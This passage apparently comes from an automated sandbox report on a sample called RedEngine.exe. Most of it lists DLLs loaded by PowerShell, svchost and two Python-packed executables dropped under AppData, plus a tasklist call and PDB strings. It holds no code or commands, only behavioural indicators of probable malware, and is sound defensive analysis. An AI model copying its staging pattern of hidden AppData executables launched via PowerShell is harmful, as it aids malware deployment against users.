                        Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: tiledatarepository.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: staterepository.core.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepository.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositorycore.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: mrmcorer.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                        Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: python3.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: tcl86t.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: tk86t.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: zlib1.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: logoncli.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: textinputframework.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: coreuicomponents.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: ntmarta.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: coremessaging.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: wintypes.dll
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: vcruntime140.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: python3.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: libffi-8.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: libcrypto-3.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: libssl-3.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: tcl86t.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: tk86t.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: zlib1.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: logoncli.dll
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeSection loaded: netutils.dll
                        Source: C:\Users\user\Desktop\RedEngine.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: RedEngine.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: RedEngine.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1495251881.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, mgne4i3n.t1d2.exe, 0000001F.00000002.3808593718.00007FFB1E3A3000.00000002.00000001.01000000.00000014.sdmp, clppth.exe, 00000026.00000003.1855125182.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1948258796.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3799490703.00007FFB029C2000.00000002.00000001.01000000.0000000E.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3803291292.00007FFB041BF000.00000002.00000001.01000000.00000022.sdmp, clppth.exe, 00000029.00000003.2059501286.000002C498ACE000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: mgne4i3n.t1d2.exe, 0000001F.00000002.3797179498.00007FFB02511000.00000002.00000001.01000000.00000016.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mgne4i3n.t1d2.exe, 0000001F.00000002.3809366779.00007FFB226D1000.00000002.00000001.01000000.00000010.sdmp
                        Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mgne4i3n.t1d2.exe, 0000000E.00000003.1480606739.000002C8869BC000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000026.00000003.1848674222.00000156D218C000.00000004.00000020.00020000.00000000.sdmp, clppth.exe, 00000029.00000003.1932878487.000002C498ACB000.00000004.00000020.00020000.00000000.sdmp
